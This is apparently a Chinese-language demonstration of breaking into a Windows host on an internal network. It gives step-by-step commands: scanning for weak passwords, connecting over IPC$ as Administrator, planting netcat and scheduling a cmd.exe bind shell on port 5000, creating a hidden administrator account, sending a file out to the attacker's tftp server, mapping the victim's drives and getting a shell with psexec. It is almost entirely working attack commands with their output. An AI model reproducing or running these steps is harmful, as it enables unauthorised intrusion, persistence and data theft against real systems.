先扫描内部网段（网上扫描软件很多，我习惯用X-Scan），获得弱密码

可以看到现在已经扫描出来许多弱密码，可以进一步控制

首先和对方建立连接
net use //10.1.12.84/ipc$ "" /user:"Administrator" 命令成功完成。
这是和ip为10.1.12.84的计算机建立IPC连接

copy nc.exe //10.1.12.84/admin$/system32,    nc.exe是一个获得控制台木马的服务器端。
复制一个文件到对方计算机的system32目录下面
这里复制的是一个telnet类连接工具。
nc是netcat的简写，通常称为黑客界的"瑞士军刀"，功能比较强大。

net time //10.1.12.84
查看对方计算机时间，以便利用计划任务   上午 08:40

at //10.1.12.84 08:42 nc -l -p 5000 -e cmd.exe
新加了一项作业，其作业 ID = 1
添加一个任务，在08:42运行；运行之后将开放一个端口：5000
可以通过这个端口获得一个shell ,即控制台

运行之后就可以连接了
nc 10.1.12.84 5000
和对方计算机连接。本地的nc.exe 和对方的nc.exe 建立连接，获得一个shell.

出现C:/WINDOWS/system32>
现在就成功进入了对方计算机，管理员权限。

 

现在测试一下能否在对方计算机上执行命令

查看用户
net user
3个用户

添加一个用户试试。
net user testuser testpass /add
命令成功完成

查看用户
net user
4个用户

将添加的用户加入管理员组。
net localgroup administrators testuser /add
命令成功完成

看看刚添加的用户情况
net user testuser
管理员Administrators组

删除用户
net user testuser /del

ipconfig 看它的IP :  10.1.12.84

窃取资料
dir c:/
假设现在要c:/SOUND.LOG
先在本地架设tftp服务器
tftp -i 10.1.16.148 put c:/sound.log
成功传回

 

退出。

再测试一下磁盘映射，现在我的电脑的硬盘分区为C D E F
net use x: //10.1.16.148/c$
查看我的电脑，多了一个x盘。
现在操作对方文件如同操作自己计算机上的文件一样。
x盘实际上就是对方的c盘
删除映射
net use x: /del

利用管道工具psexec可以直接在建立IPC连接之后快速地取得控制权
psexec.exe //10.1.12.84 cmd
出现了shell,又进去了！
C:/WINDOWS/system32>

退出！

删除连接
net use //10.1.12.84/ipc$ /del

演示结束，谢谢 ！